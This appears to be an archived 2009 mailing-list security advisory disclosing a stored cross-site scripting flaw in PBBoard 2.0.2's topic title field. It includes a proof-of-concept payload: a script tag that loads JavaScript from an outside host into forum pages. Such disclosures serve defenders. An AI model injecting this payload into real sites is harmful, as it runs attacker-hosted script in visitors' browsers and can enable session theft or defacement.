|
|
 |
| New User, Welcome! Login |
[Sec-Area Advisory]PBBoard <=2.0.2 - XSS in Topic
| From: |
admin sec-area com |
| To: |
bugtraq securityfocus com |
| Cc: |
|
| Subject: |
[Sec-Area Advisory]PBBoard <=2.0.2 - XSS in Topic |
| Date: |
Tue - Oct 06, 2009 08:33 AM |
[Sec-Area Advisory]pbboard <=2.0.2 - XSS in Topic
Details
=======
Product: PHP <= PBBoard
Security-Risk: moderated
Remote-Exploit: yes
Vendor-URL: http://www.pbboard.com
Credits
============
Discovered by: rUnViRuS
site: http://www.sec-area.com
Affected Products:
----------------------------
test on PBBoard 2.0.2
maybe work under 2.0.2
Original Advisory:
============
http://www.sec-area.com/?p=141
More Details
============
1. Cross-site scripting
-----------------------------------
enable malicious attackers to inject client-side script into web pages
Proof of concept:
Make a new topic in In the title Write some Javascript/HTML
Back to forums
You will find the code works
Proof of concept code:
go to : http://www.pbboard.com/forums/index.php?page=new_topic&index=1&id=[Section id ]
then
In the title Write some Javascript/HTML
like : <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Back to forums
You will find the code works
--------------------------------------------
[W]orld [D]efacers [T]eam
http://www.Sec-area.com
--------------------------------------------
|
|
|
Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!
